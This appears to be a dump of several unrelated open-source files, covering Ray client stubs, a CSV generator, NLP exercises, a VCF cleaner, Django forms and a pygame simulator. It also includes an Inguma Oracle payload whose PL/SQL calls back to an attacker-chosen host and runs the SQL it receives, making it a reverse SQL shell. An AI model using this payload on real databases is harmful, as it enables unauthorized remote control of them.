] | permissive | oliverhu/ray | c69f9c48a7869b0231ccf6c88e3252ba579b49d3 | 2f8e308444bbf552d6bf8d3167d694847e85ec63 | refs/heads/master | 2023-02-17T02:25:26.564474 | 2020-12-10T01:19:36 | 2020-12-10T01:19:36 | 295,881,584 | 0 | 1 | Apache-2.0 | 2021-01-05T05:19:30 | 2020-09-16T00:30:49 | Python | UTF-8 | Python | false | false | 4,472 | py | # This file defines an interface and client-side API stub
# for referring either to the core Ray API or the same interface
# from the Ray client.
#
# In tandem with __init__.py, we want to expose an API that's
# close to `python/ray/__init__.py` but with more than one implementation.
# The stubs in __init__ should call into a well-defined interface.
# Only the core Ray API implementation should actually `import ray`
# (and thus import all the raylet worker C bindings and such).
# But to make sure that we're matching these calls, we define this API.
from abc import ABC
from abc import abstractmethod
from typing import TYPE_CHECKING, Any, Union
if TYPE_CHECKING:
from ray.experimental.client.common import ClientStub
from ray.experimental.client.common import ClientObjectRef
from ray._raylet import ObjectRef
# Use the imports for type checking. This is a python 3.6 limitation.
# See https://www.python.org/dev/peps/pep-0563/
PutType = Union[ClientObjectRef, ObjectRef]
class APIImpl(ABC):
"""
APIImpl is the interface to implement for whichever version of the core
Ray API that needs abstracting when run in client mode.
"""
@abstractmethod
def get(self, *args, **kwargs) -> Any:
"""
get is the hook stub passed on to replace `ray.get`
Args:
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def put(self, vals: Any, *args,
**kwargs) -> Union["ClientObjectRef", "ObjectRef"]:
"""
put is the hook stub passed on to replace `ray.put`
Args:
vals: The value or list of values to `put`.
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def wait(self, *args, **kwargs):
"""
wait is the hook stub passed on to replace `ray.wait`
Args:
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def remote(self, *args, **kwargs):
"""
remote is the hook stub passed on to replace `ray.remote`.
This sets up remote functions or actors, as the decorator,
but does not execute them.
Args:
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def call_remote(self, instance: "ClientStub", *args, **kwargs):
"""
call_remote is called by stub objects to execute them remotely.
This is used by stub objects in situations where they're called
with .remote, eg, `f.remote()` or `actor_cls.remote()`.
This allows the client stub objects to delegate execution to be
implemented in the most effective way whether it's in the client,
clientserver, or raylet worker.
Args:
instance: The Client-side stub reference to a remote object
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def close(self) -> None:
"""
close cleans up an API connection by closing any channels or
shutting down any servers gracefully.
"""
pass
class ClientAPI(APIImpl):
"""
The Client-side methods corresponding to the ray API. Delegates
to the Client Worker that contains the connection to the ClientServer.
"""
def __init__(self, worker):
self.worker = worker
def get(self, *args, **kwargs):
return self.worker.get(*args, **kwargs)
def put(self, *args, **kwargs):
return self.worker.put(*args, **kwargs)
def wait(self, *args, **kwargs):
return self.worker.wait(*args, **kwargs)
def remote(self, *args, **kwargs):
return self.worker.remote(*args, **kwargs)
def call_remote(self, instance: "ClientStub", *args, **kwargs):
return self.worker.call_remote(instance, *args, **kwargs)
def close(self) -> None:
return self.worker.close()
def __getattr__(self, key: str):
if not key.startswith("_"):
raise NotImplementedError(
"Not available in Ray client: `ray.{}`. This method is only "
"available within Ray remote functions and is not yet "
"implemented in the client API.".format(key))
return self.__getattribute__(key)
| [
"noreply@github.com"
] | oliverhu.noreply@github.com |
7003c2b3092fee3719bcdfa6911960bce8955313 | 151ed184329fa65ef0a22a76336984ae41587db6 | /GenerateCSV.py | 9e124f0efe5dffe3f6b763d72545a6557cf28a47 | [] | no_license | SherDG/Oxygen2020 | ce05fb0142009339c83dfe4bf898217a0159a8ba | 3ca80138ed515d396152933b8a3a9e79e92d0151 | refs/heads/master | 2022-12-19T15:35:07.630301 | 2020-09-19T09:00:57 | 2020-09-19T09:00:57 | 289,451,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 932 | py | #!/usr/bin/python
# Import of the libraries
import csv
import random
# def - is a function
def createCsvLine(arr):
# print(arr)
return '"' + '","'.join(arr) + '"\n'
#number of the inserts
records=10
#print("Making %d records\n" % records)
# names of the columns
fieldnames=['id','name','age','city']
#open file, w - is for write
writer = open("people.csv", "w")
# base of names and cities
names=['Deepak', 'Sangeeta', 'Geetika', 'Anubhav', 'Sahil', 'Akshay']
cities=['Delhi', 'Kolkata', 'Chennai', 'Mumbai']
# column names write in file
writer.write(createCsvLine(fieldnames))
# loop must start empty value
item = []
for i in range(0, records):
# str(i) - id to string
# random.choice(names) - random choice from names
# str is for string
#
item = [str(i),random.choice(names),str(random.randint(24,26)), random.choice(cities)]
# push item to the file
writer.write(createCsvLine(item))
writer.close()
| [
"dsherstiuk@cloudlinux.com"
] | dsherstiuk@cloudlinux.com |
b2698d399ebf21fb08f31d626543f73cb31cc86d | 8888ef245f962b7745ce3d95ff8412618cb7efad | /NLP_2015/4/section4.py | 8c60240e273ddfac67b092387319f39bd2de84f8 | [] | no_license | tegetege/tegetege_NLP_100 | 6b3305479426c61660362f0a8c8c8ca3a803636d | 5d90509db268d5977a369a157f636c718955dd9c | refs/heads/master | 2021-05-05T04:27:32.074757 | 2020-09-27T09:20:14 | 2020-09-27T09:20:14 | 118,591,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,433 | py |
class Section_4():
'''
[問い]
夏目漱石の小説『吾輩は猫である』の文章(neko.txt)をMeCabを使って形態素解析し,
その結果をneko.txt.mecabというファイルに保存せよ.
[使用コマンド]
$mecab -d /usr/local/lib/mecab/dic/mecab-ipadic-neologd neko.txt -o neko.txt.mecab
辞書にはオプションで、"mecab-ipadic-NEologd"を利用
'''
'''
[概要]
・neko.txt ファイルをmecabに通したものがneko.txt.mecab
・self.word_listはneko.txt.mecabの単語部分のリスト
・self.morphemesはneko.txt.mecabの形態素部分のリスト
'''
def __init__(self):
#クラス内でデータを格納するリストを管理
self.word_list = [] #単語部分のリスト
self.morphemes = [] #形態素部分のリスト,word_listに同期
'''
(※)問題を読み違えていたため、このコメント部分はお釈迦
#ss5で利用変数
#self.longest_list_num = 0 #最も長い連接の最初のリストナンバー
#self.longest_count = 0 #最も長い連接回数を記録
'''
#形態素解析結果の読み込み
def ss0(self):
'''
こんな感じで表現したい
{
surface: '皇帝',
base: '皇帝',
pos: '名刺',
pos1: '一般'
},
'''
'''
########
データ形成をする上でエラーが出るため、neko.txt.mecabの最後の
空白行を消去した。
########
'''
with open("neko.txt.mecab", "r") as f:
data = f.read()
data = data.split('\n') #データ形成 : リスト化
#データ形成 : 不要なEOS要素を削除
while 'EOS' in data:
data.remove('EOS')
for i in range(len(data)):
data[i]= data[i].split('\t') #データ形成 2次元配列化
self.word_list.append(data[i][0]) #単語の部分をリスト化
if len(data[i]) > 1: #エラー回避
self.morphemes.append(data[i][1].split(',')) #形態素部分をリスト化
else:
pass
for i in range(len(self.word_list)):
print(i)
print('surface',':',self.word_list[i])
print('base',':',self.morphemes[i][6])
print('pos',':',self.morphemes[i][0])
print('pos1',':',self.morphemes[i][1])
print('-------------------------')
def make_data(self):
with open("neko.txt.mecab", "r") as f:
data = f.read()
data = data.split('\n') #データ形成 : リスト化
#データ形成 : 不要なEOS要素を削除
while 'EOS' in data:
data.remove('EOS')
for i in range(len(data)):
data[i]= data[i].split('\t') #データ形成 2次元配列化
self.word_list.append(data[i][0]) #単語の部分をリスト化
if len(data[i]) > 1:
self.morphemes.append(data[i][1].split(',')) #形態素部分をリスト化
else:
pass
#動詞
def ss1(self):
self.make_data() #データ生成
for i in range(len(self.word_list)):
if self.morphemes[i][0] =='動詞':
print('-------------------------')
print('surface',':',self.word_list[i])
print('pos',':',self.morphemes[i][0])
#動詞の原形
def ss2(self):
self.make_data() #データ生成
for i in range(len(self.word_list)):
if self.morphemes[i][0] =='動詞':
print('-------------------------')
print('surface',':',self.word_list[i])
print('base',':',self.morphemes[i][6])
#サ変名詞
def ss3(self):
'''
>見当 名詞,サ変接続,*,*,*,*,見当,ケントウ,ケントー
これを抜き出してくれば良いだけなので難しくない
'''
self.make_data() #データ生成
for i in range(len(self.word_list)):
if self.morphemes[i][0] == '名詞' and self.morphemes[i][1] == 'サ変接続':
print('-------------------------')
print('サ変名詞',':',self.word_list[i])
#「AのB」
def ss4(self):
'''
2つの名詞が「の」で連結されている名詞句を抽出せよ
・「の」しか入っていないword_list番号を記録して、その前後の形態素を確認する
'''
self.make_data() #データ生成
for i in range(len(self.word_list)):
if self.word_list[i] == 'の':
if self.morphemes[i-1][0] == '名詞' and self.morphemes[i+1][0] == '名詞':
print('-------------------------')
print('番号:',i)
print(self.word_list[i-1],self.word_list[i],self.word_list[i+1])
print(self.morphemes[i-1][0],self.morphemes[i][0],self.morphemes[i+1][0])
#名詞の連接
def ss5(self):
'''
(※)出題内容がわからなかったため「素人の言語処理100本ノック」を
参考にさせていただきました。
https://qiita.com/segavvy/items/bda3a16d8bb54bd01f73
'''
self.make_data() #データ生成
noun_list = [] #重複ありのリスト
nouns = [] #一時的に名詞を保持するリスト
for i in range(len(self.word_list)):
if self.morphemes[i][0] == '名詞' :
nouns.append(self.word_list[i]) #一時保持
else:
#名詞ではないときは、一時保持リストからアペンドして本リストに入れる
if len(nouns) > 1:
noun_list.append(''.join(nouns))
nouns = []
nouns_set = set(noun_list) #集合化することで、重複を消す!! ⇦ これ、知った時に感動した
print(nouns_set)
#単語の出現頻度
def ss6(self):
'''
文章中に出現する単語とその出現頻度を求め,出現頻度の高い順に並べよ.
参考:http://www.freia.jp/taka/blog/356/index.html
'''
self.make_data() #データ生成
words_dic = {}
#カウンティング
for i in range(len(self.word_list)):
#.get()メソッドを利用すれば、辞書にアイテムが無い場合の初期値を設定できる
words_dic[self.word_list[i]] = words_dic.get(self.word_list[i],0) + 1
#辞書の降順ソート
for k, v in sorted(words_dic.items(), key=lambda x: -x[1]):
#降順 → x: -x[1] 昇順 → x: x[1]
if int(v) > 500: #500以下は表示しない
print(str(k) + ": " + str(v))
#ss6と同じもの、最後に辞書データをreturnする
def sorted_word_dic(self):
self.make_data() #データ生成
words_dic = {}
#カウンティング
for i in range(len(self.word_list)):
#.get()メソッドを利用すれば、辞書にアイテムが無い場合の初期値を設定できる
words_dic[self.word_list[i]] = words_dic.get(self.word_list[i],0) + 1
#辞書の降順ソート
return sorted(words_dic.items(), key=lambda x: -x[1])
#ソートしていない単語と出現頻度の辞書データをreturnする
def word_dic(self):
self.make_data() #データ生成
words_dic = {}
#カウンティング
for i in range(len(self.word_list)):
#.get()メソッドを利用すれば、辞書にアイテムが無い場合の初期値を設定できる
words_dic[self.word_list[i]] = words_dic.get(self.word_list[i],0) + 1
#辞書の降順ソート
return words_dic
#頻度上位10語
def ss7(self):
'''
出現頻度が高い10語と語とその出現頻度をグラフで表示すること
matplotlibを利用する
'''
import matplotlib.pyplot as plt
import numpy as np
#日本語を表示するフォントを指定する
import matplotlib as mpl
mpl.rcParams['font.family'] = 'AppleGothic'
sorted_dic = {}
sorted_dic = self.sorted_word_dic() #出現頻度によってソート済みのリストを受け取る
'''
sorted_dic = [('の', 9114), ('。', 7484), ('、', 6772), ....]
'''
label = []
count = []
for i in range(0,10):
label.append(sorted_dic[i][0]) #x軸の名前
count.append(sorted_dic[i][1]) #y軸
left = np.array(range(0,10)) #x軸には、0から始まるリストを入れる
height = np.array(count)
plt.bar(left,height,tick_label=label, align="center")
plt.show()
#ヒストグラム
def ss8(self):
'''
単語の出現頻度のヒストグラム(横軸に出現頻度,縦軸に出現頻度をとる単語の種類数を棒グラフで表したもの)を描け.
X軸 出現頻度
Y軸 単語の種類数
[1]
参考になりそうなサイト:
https://pythondatascience.plavox.info/matplotlib/%E3%83%92%E3%82%B9%E3%83%88%E3%82%B0%E3%83%A9%E3%83%A0
[2]
1つのキーに複数の値が対応するハッシュを作る:
http://lightson.dip.jp/zope/ZWiki/1191_e3_81_a4_e3_81_ae_e3_82_ad_e3_83_bc_e3_81_ab_e8_a4_87_e6_95
_b0_e3_81_ae_e5_80_a4_e3_81_8c_e5_af_be_e5_bf_9c_e3_81_99_e3_82_8b_e3_83_8f_e3_83_83_e3_82_b7_e3_83
_a5_e3_82_92_e4_bd_9c_e3_82_8b
'''
import matplotlib.pyplot as plt
#日本語を表示するフォントを指定する
import matplotlib as mpl
mpl.rcParams['font.family'] = 'AppleGothic'
word_dic = {}
word_dic = self.word_dic() #出現頻度によってソート済みのリストを受け取る
count_frequency = {} #出現回数と、その単語のリストが入った辞書
for k,v in word_dic.items():
count_frequency.setdefault(v,[]).append(k) #サイト[2]を参考にした
'''
count_frequency =
{...,278: ['寒月'], 974: ['です'], 97: ['ええ'],
146: ['私'], 343: ['迷亭'], 433: ['…']...}
↓
↓
ヒストグラムに投げるデータ(リスト型)
[1,1,1,1,....,234,234,235,235,235,236,236....]
'''
count_frequency_sort = sorted(count_frequency.items(), key=lambda x: x[0])
hist_list = []
for i in range(len(count_frequency_sort)):
for j in range(len(count_frequency_sort[i][1])):
#ここ頭悪い
#出現回数分、出現回数をリストに追加する
hist_list.append(int(count_frequency_sort[i][0]))
#ヒストグラムにデータをセットしていく
plt.hist(
hist_list,
bins = 20,
range=(1,20))
plt.xlim(xmin=1, xmax=20)
# グラフのタイトル、ラベル指定
plt.title("38. ヒストグラム")
plt.xlabel('出現頻度')
plt.ylabel('単語の種類数')
# グリッドを表示
plt.grid(axis='y')
# 表示
plt.show()
#出現頻度が入ったリストが帰ってくる
def frequency_list(self):
import matplotlib.pyplot as plt
word_dic = {}
word_dic = self.word_dic() #出現頻度によってソート済みのリストを受け取る
count_frequency = {} #出現回数と、その単語のリストが入った辞書
for k,v in word_dic.items():
count_frequency.setdefault(v,[]).append(k)
count_frequency_sort = sorted(count_frequency.items(), key=lambda x: x[0])
return count_frequency_sort
#Zipfの法則
def ss9(self):
'''
単語の出現頻度順位を横軸,その出現頻度を縦軸として,両対数グラフをプロットせよ.
'''
import matplotlib.pyplot as plt
import numpy as np
#日本語を表示するフォントを指定する
import matplotlib as mpl
mpl.rcParams['font.family'] = 'AppleGothic'
frequency_2D_list = self.frequency_list()
frequency_list = [] #x軸:順位
word_count_list = [] #y軸:出現頻度
for i in range(len(frequency_2D_list)):
frequency_list.append(frequency_2D_list[i][0])
word_count_list.append(len(frequency_2D_list[i][1]))
plt.xscale('log')
plt.yscale('log')
plt.xlim(1,len(frequency_list)+1)
plt.ylim(1,word_count_list[0])
x = frequency_list
y = word_count_list
plt.title("39. Zipfの法則")
plt.plot(x,y,'o')
plt.show()
num = input('サブセクション番号入力:')
do = Section_4()
ss_num = 'ss' + str(num)
eval('do.' + ss_num + '()') #入力した数字の関数を実行 | [
"t.tose@uec.ac.jp"
] | t.tose@uec.ac.jp |
1b16e6e3300a0e361ece4ca07a41c908f4cba675 | 02717951f753acec835bfe3630ccb8bb89e213d1 | /lib/vcf_header_clean.py | 2dfb95603aa09ec5b128490f16b3492c3ad31f0a | [
"MIT"
] | permissive | uiuc-bioinf-club/vcf_anno | 6b87246d3e6e258c53de560bbe530accd30a9968 | 9fbf0d7597ec5f66a81b91a7ff0c3fd33d865640 | refs/heads/master | 2020-04-16T05:27:48.866844 | 2019-01-11T20:48:38 | 2019-01-11T20:48:38 | 165,306,182 | 0 | 0 | null | 2019-01-11T20:35:51 | 2019-01-11T20:35:50 | null | UTF-8 | Python | false | false | 2,201 | py |
import re
def vcfheader_clean(IN_vcf_file, OUT_vcf_header_file):
"""
Check whether a vcf file contains description with comma in them, which may raise warnings for some vcftools version such as vcftools-0.1.16
"""
#IN_vcf_file = vcf_file
#OUT_vcf_header_file = './header_commaclear.tmp.vcfheader'
FIX_COMMA = 0
new_header_list = []
with open(IN_vcf_file, 'r') as vcff:
for line in vcff:
if(line[0]!="#"):
break
if(line[0:2] == '##' and line.split("=")[0] in ["##INFO", "##FORMAT"]):
## check comma in the description part of INFO.
description_after = re.search(r'Description\=.+\>', line)
if(description_after):
if("," in description_after.group()):
FIX_COMMA = 1
description_after_commaclear = description_after.group().replace(",", " ").strip()
description_before = re.search(r'.+Description', line).group().replace("Description","")
line_comma_clear = description_before + description_after_commaclear
line = line_comma_clear
new_header_list.append(line.strip())
if(FIX_COMMA):
print("Fixed vcf file header is in : \n"+ OUT_vcf_header_file)
print("It can be used to reheader the vcf file. Example: ")
print("bcftools reheader -h "+ OUT_vcf_header_file + " --output ./newheader.tmp.txt "+ IN_vcf_file + "\n")
with open(OUT_vcf_header_file,'w') as OUTf:
OUTf.write("\n".join(new_header_list))
else:
print("The vcf file is comma-free in INFO tags.")
if __name__ == "__main__":
"""
Generate new comma-free headers for INFO and FORMAT tags in vcffile.
Example: python --vcf
"""
import argparse
parser = argparse.ArgumentParser(description = "clean vcf header")
parser.add_argument('--vcf', required=True, help="vcffile")
parser.add_argument('--newheader', required = False, default = "./newheader.tmp.txt" , help="where to put the new header")
args = parser.parse_args()
vcfheader_clean( args.vcf, args.newheader )
| [
"wingsyiz@gmail.com"
] | wingsyiz@gmail.com |
1d2e0f0ee19889f0cf2814a73fdeea1efce3039c | 0086c318ab4e2f753e91cafbcf6964c592e8c90e | /basic_app/forms.py | 3ce27d669faa19380d77723e5ed5542ccac7fd64 | [] | no_license | yogeshshukla/django-example | 045c7b6d812cdb8d9caf0efae6bfa09fcf694747 | 6c7d752511ad4f9e16a452e950711f0c9ddb6c5b | refs/heads/master | 2022-07-31T21:57:14.956530 | 2020-05-18T10:38:26 | 2020-05-18T10:38:26 | 264,907,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | from django import forms
from django.contrib.auth.models import User
from basic_app.models import UserProfileInfo
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput())
class Meta():
model = User
fields = ('username', 'email', 'password')
class UserProfileInfoForm(forms.ModelForm):
class Meta():
model = UserProfileInfo
fields = ('portfolio_site', 'profile_pic') | [
"yogesh.shukla@infobeans.com"
] | yogesh.shukla@infobeans.com |
11f463800b1550cd3bd4d4ae92bec076ebab5ff8 | 3bf004648ac22448cef6912e775bab46148d0978 | /manage.py | fa5e5760efd27b0af28aab7f5fca8b684ef40f92 | [] | no_license | ncats/zebra_rank | 2f5959cf1886318b66a8b464095156ea4ee7aece | d8fd697c54941cf0739dc0e1a68642113202cadf | refs/heads/master | 2022-11-28T03:11:01.070696 | 2020-08-07T21:39:34 | 2020-08-07T21:39:34 | 281,787,726 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'zebra_rank.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"caodac@gmail.com"
] | caodac@gmail.com |
8cae290d2e0f4814c027458fafbd56b76c6c8859 | e99bc88c211c00a701514761fdfcb9b755e6de4e | /payloads/oracle/reverse_sql.py | c8a4d05996c833f8976901daa94da532f212e589 | [] | no_license | Wuodan/inguma | 177f40f636d363f081096c42def27986f05e37e7 | c82e7caf86e24ad9783a2748c4f1d9148ad3d0ee | refs/heads/master | 2020-03-26T21:52:28.421738 | 2013-03-20T20:45:13 | 2018-08-20T12:19:30 | 145,413,992 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,506 | py | #!/usr/bin/python
"""
NOTE: Should be rewritten from scratch!!!!
"""
import sys
sys.path.append("../../lib")
sys.path.append("../lib")
sys.path.append("lib")
import run_command
from oracleids import randomizeSpaces
data = """
DECLARE
data varchar2(32767);
v_ret varchar2(32767);
len number;
conn utl_tcp.connection;
BEGIN
conn := utl_tcp.open_connection(remote_host => '%HOST%', remote_port => %PORT%, charset => 'US7ASCII');
loop
data := utl_tcp.get_line(conn);
data := substr(data, 1, length(data)-1);
if lower(data) = 'exit' then
exit;
else
begin
if lower(data) like 'select%' then
execute immediate data into v_ret;
else
execute immediate data;
v_ret := 'Statement executed';
end if;
len := utl_tcp.write_line(conn, 'RET:' || v_ret);
exception
when others then
len := utl_tcp.write_line(conn, 'ERROR: ' || sqlcode || ' - ' || sqlerrm);
end;
end if;
dbms_output.put_line('"' || data || '"');
end loop;
utl_tcp.close_connection(conn);
END;
"""
name = "reverse_sql"
brief_description = "Run a blind reverse SQL terminal"
class CPayload:
user = "TEST"
function = "F1"
useDML = False
covert = 0
verifyCommand = ""
connection = None
type = 0
host = ""
port = ""
connection = None
def __init__(self):
pass
def run(self):
global data
tmp = data
tmp = tmp.replace("%USER%", self.user)
if self.host == "":
self.host = raw_input("Host to connect: ")
if self.port == "":
self.port = raw_input("Port to listen: ")
tmp = tmp.replace("%HOST%", self.host)
tmp = tmp.replace("%PORT%", self.port)
if self.covert > 0:
# Currently only one IDS evasion technique is used
tmp = randomizeSpaces(tmp)
objRun = run_command.CPayload()
objRun.idsTechniques = self.covert
objRun.user = self.user
objRun.command = tmp
ret = objRun.run()
return ret
def verify(self, connection):
sql = self.verifyCommand
cursor = connection.cursor()
cursor.execute(sql)
for x in cursor.fetchall():
return True
return False
def main():
import cx_Oracle
a = CPayload()
a.idsTechniques = 1
cmd = a.run()
print cmd
if __name__ == "__main__":
main()
| [
"muts@kali.org"
] | muts@kali.org |
96c1cabf5d959dc6e574d2108c2fb2098c5f8b1f | a6a946586d91307c4d84d5d3ed9f0d1e7db6cc0b | /newvenv/bin/python-config | 02a31f44f8bd03cfea3297049e7fc189f4500d93 | [] | no_license | kibach/saera_web | 8f47f7062252628d4938059bd015127845b573ba | 94cb86cbbe3061e57ce597e5e45641ebcd85eda7 | refs/heads/master | 2020-12-25T04:21:26.817468 | 2016-06-06T17:28:52 | 2016-06-06T17:28:52 | 60,018,098 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,347 | #!/Users/Vera_M/labrab3/newvenv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"theassd1337@yandex.ru"
] | theassd1337@yandex.ru | |
d6a5e7f3d5471a1459d2abddaf8a4b271d588aa2 | a0af7c96805b17741675b8ecdf3f3fdc6d149c61 | /simulate.py | c831cb6c3c278768cdd34c02e4ab76032aa921b3 | [] | no_license | ajwood/Group-Dynamics-Simulator | 7e72cf007771df62c23eb2bc6bae7f324f3fa2d0 | fc0a58e83708a8127db0928001f7af9f9fcf60f5 | refs/heads/master | 2020-05-15T10:11:38.817050 | 2012-04-02T01:13:53 | 2012-04-02T01:13:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,876 | py | #!/usr/bin/python
import pygame
from pygame.locals import *
from boxes import SheepBox
import time
import os
import sys
import numpy as np
import itertools
import math
from functools import partial
import collections
class GameMain():
def __init__( self, color_bg=(0,0,0) ):
pygame.init()
pygame.font.init()
pygame.display.set_caption( "Group Dynamics Simulator" )
self.color_bg = color_bg
self.clock = pygame.time.Clock()
self.limit_fps = True
self.limit_fps_max = 60
# actual size
self.width = 1000
self.height = 700
self.screen = pygame.display.set_mode(( self.width, self.height ))
self.sheep = []
self.options_init()
self.action_panel_init()
self.control_panel_init()
self.game_init()
#self.refresh_distance_matrix()
def game_init(self, color_list=None, init_speed=7):
self.sheep = []
self.add_sheep( self.options.get('n_boxes').value )
def update_n_boxes(self):
n_boxes = self.options.get('n_boxes').value
if n_boxes < len( self.sheep ) :
self.sheep = self.sheep[:n_boxes]
elif n_boxes > len( self.sheep ) :
self.add_sheep( n_boxes - len( self.sheep ) )
def add_sheep(self, n=1, loc_list=None, init_speed=7, color_list=None, name=None, retreat=False):
if loc_list != None and len( loc_list ) != n:
raise Exception( "The sheep are confused about where they're supposed to be..." )
if loc_list == None:
loc_list = []
if color_list == None:
color_list = []
for s in range( n ):
if len( color_list ) > 0:
color = color_list[n % len( color_list )]
else:
color = self.randColor()
if len( loc_list ) > 0:
loc = loc_list[ s ]
else:
loc = self.randLoc()
self.sheep.append( SheepBox(self,
loc,
self.randVelocity(init_speed),
color=color,
name=name,
retreat=retreat,
)
)
def control_panel_init(self):
self.control_panel_rect = Rect( 700, 0, 300, 700 )
self.control_panel = self.screen.subsurface( self.control_panel_rect )
# Create surfaces with our images on them
self.checkbox_unselected = pygame.image.load(os.path.join("graphics","checkbox.png")).convert()
self.checkbox_selected = pygame.image.load(os.path.join("graphics","selected.png")).convert()
self.scroll_bar_left = pygame.image.load(os.path.join("graphics","scroll_bar_left.png")).convert()
self.scroll_bar_right = pygame.image.load(os.path.join("graphics","scroll_bar_right.png")).convert()
# Callbacks for different option types event handling
# Generic boolean button
def boolean_event_handler( opt_name, x, y, click_pos=None ):
if ( self.options.toggle(opt_name) ):
self.screen.blit(self.checkbox_selected, (x,y))
else:
self.screen.blit(self.checkbox_unselected, (x,y))
# Generic int/float slider
def slider_event_handler( opt_name, slider, click_pos=None ):
value = slider.click( click_pos )
self.options.set(opt_name, value)
def n_boxes_event_handler( slider, click_pos=None ):
value = slider.click( click_pos )
self.options.set('n_boxes', value)
self.update_n_boxes()
# Define sliders
# TODO: we might be able to get rid of this list now that we're using
# the functools.partil to close the callbacks
sliders = {}
self.control_buttons = {}
y_offset = 10
for opt in self.options.values():
rect = Rect( 710, y_offset, 100 + 2 * self.scroll_bar_left.get_width(), 20 )
if opt.key == 'n_boxes':
sliders[ 'n_boxes' ] = Slider( self, 710, y_offset, opt )
self.control_buttons[ 'n_boxes' ] = ( rect, partial(n_boxes_event_handler, sliders[ 'n_boxes' ] ) )
elif opt.val_type == bool :
self.control_buttons[ opt.key ] = ( rect, partial(boolean_event_handler, opt.key, 710, y_offset ) )
elif opt.val_type == float or opt.val_type == int:
sliders[ opt.key ] = Slider( self, 710, y_offset, opt )
self.control_buttons[ opt.key ] = ( rect, partial(slider_event_handler, opt.key, sliders[ opt.key ] ) )
y_offset = y_offset + 20
for name, button in self.control_buttons.items():
opt = self.options.get(name)
rect = button[0]
onclick = button[1]
if opt.val_type == bool :
# Draw the checkbox
if self.options.get( name ).value :
self.screen.blit(self.checkbox_selected, (rect.x,rect.y))
else:
self.screen.blit(self.checkbox_unselected, (rect.x,rect.y))
# Draw the label TODO: draw this on control_panel and never update
fontobject = pygame.font.Font( None, 18 )
self.screen.blit( fontobject.render(name, 1, (255,255,255)), (rect.x+20,rect.y) )
elif opt.val_type == float or opt.val_type == int:
onclick()
fontobject = pygame.font.Font( None, 18 )
self.screen.blit( fontobject.render(name, 1, (255,255,255)), (rect.x+140,rect.y) )
def action_panel_init(self):
self.action_panel_rect = Rect(0, 0, 700, 700)
self.action_panel = self.screen.subsurface( self.action_panel_rect )
pygame.draw.rect( self.screen, Color('yellow') , self.action_panel_rect, 3 )
def options_init(self):
options = (
#TODO: shold reconsider some of the defaults/min/max
('n_boxes', 3, K_n, int, 1, 101 ),
('gravity', False, K_g, bool, None, None ),
('A0', 0.0015, K_a, float, 0, 0.01 ),
('ROI', 200, K_r, int, 0, 400 ),
#('critical_mass', 40, K_k, int, 40, 500 ),
('max_speed', 5, K_m, float, 1, 20 ),
('bounce_off_walls', False, K_b, bool, None, None ),
('withdraw', False, K_w, bool, None, None),
('draw_tail_len', 30, K_l, int, 1, 200, ),
('draw_ROI', False, K_d, bool, None, None ),
)
self.options = OptionsHandler( options )
# Bind out shortcut keys to the keyboard bindings dict
self.keyboard_bindings = {}
for opt in self.options.values():
if opt.shortcut_key != None:
self.keyboard_bindings[ opt.shortcut_key ] = opt.key
def editOption( self, key ):
if( not key in self.options.keys() ):
raise UnsupportedOptionException(key)
opt = self.options.get( key )
val = self.drawOption( 10, self.height - 30, key, opt.value, editable=True )
self.options.set(key, val)
def loop(self):
while True:
self.handle_events()
self.update()
self.draw()
